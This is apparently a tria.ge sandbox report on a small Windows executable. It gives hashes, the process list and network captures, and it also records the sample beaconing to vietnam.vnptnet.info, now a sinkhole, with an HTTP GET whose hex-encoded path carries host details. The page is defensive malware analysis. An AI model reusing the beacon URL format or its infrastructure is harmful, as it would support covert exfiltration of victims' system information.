Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

1

Static

static

a750f23483...8b.exe

windows7-x64

1

a750f23483...8b.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    266s
  • max time network
    364s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    29/11/2022, 11:43 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe

  • Size

    52KB

  • MD5

    cf251699bfa4d7e44960ffd88e744719

  • SHA1

    7ff9511ebe6f95fc73bc0fa94458f18ee0fb395d

  • SHA256

    a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b

  • SHA512

    7c8a4890b559649408019f1094f4544461d43fec84fc91141a66c82e11ba4c9c8344c7de6f416d6d7bcd6fc63a04085ccf62e79a1b496684e44342c206683096

  • SSDEEP

    768:tTlI5hMmo2GQPcDZFxeJWXTjypgwW8JhaQiBOEoR:t5yh/fcdxTwwoR

Score
1/10

Malware Config

Signatures

Processes

  • C:\Users\Admin\AppData\Local\Temp\a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
    "C:\Users\Admin\AppData\Local\Temp\a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe"
    1⤵
      PID:1696

    Network

    • flag-unknown
      DNS
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      Remote address:
      8.8.8.8:53
      Request
      vietnam.vnptnet.info
      IN A
      Response
      vietnam.vnptnet.info
      IN CNAME
      a.sinkhole.yourtrap.com
      a.sinkhole.yourtrap.com
      IN CNAME
      sinkhole.dynu.net
      sinkhole.dynu.net
      IN A
      153.248.0.82
    • flag-unknown
      GET
      http://vietnam.vnptnet.info/32303133000000000000000000000000000000000000000031302E3132372E302E3532000000000056445753574A4A440000000000000000000000000000000000000000000000010841646D696E000000000000000000000000000000000000000000000000000000
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      Remote address:
      153.248.0.82:80
      Request
      GET /32303133000000000000000000000000000000000000000031302E3132372E302E3532000000000056445753574A4A440000000000000000000000000000000000000000000000010841646D696E000000000000000000000000000000000000000000000000000000 HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.9527)
      Host: vietnam.vnptnet.info
    • 153.248.0.82:80
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      152 B
       120 B
       3
      3
    • 153.248.0.82:443
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      152 B
       120 B
       3
      3
    • 153.248.0.82:5050
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      152 B
       3
    • 153.248.0.82:80
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      152 B
       120 B
       3
      3
    • 153.248.0.82:443
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      152 B
       120 B
       3
      3
    • 153.248.0.82:5050
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      152 B
       3
    • 153.248.0.82:80
      http://vietnam.vnptnet.info/32303133000000000000000000000000000000000000000031302E3132372E302E3532000000000056445753574A4A440000000000000000000000000000000000000000000000010841646D696E000000000000000000000000000000000000000000000000000000
      http
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      575 B
       132 B
       5
      3

      HTTP Request

      GET http://vietnam.vnptnet.info/32303133000000000000000000000000000000000000000031302E3132372E302E3532000000000056445753574A4A440000000000000000000000000000000000000000000000010841646D696E000000000000000000000000000000000000000000000000000000
    • 153.248.0.82:443
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      152 B
       120 B
       3
      3
    • 153.248.0.82:443
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      152 B
       120 B
       3
      3
    • 153.248.0.82:5050
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      152 B
       3
    • 153.248.0.82:80
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      144 B
       120 B
       3
      3
    • 153.248.0.82:443
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      152 B
       120 B
       3
      3
    • 153.248.0.82:5050
      vietnam.vnptnet.info
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      104 B
       2
    • 8.8.8.8:53
      vietnam.vnptnet.info
      dns
      a750f23483df9fafa3cbd6c6c1cc77f0e83556a954b58869706e518aa4fc038b.exe
      66 B
       150 B
       1
      1

      DNS Request

      vietnam.vnptnet.info

      DNS Response

      153.248.0.82

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1696-54-0x0000000075831000-0x0000000075833000-memory.dmp

      Filesize

      8KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.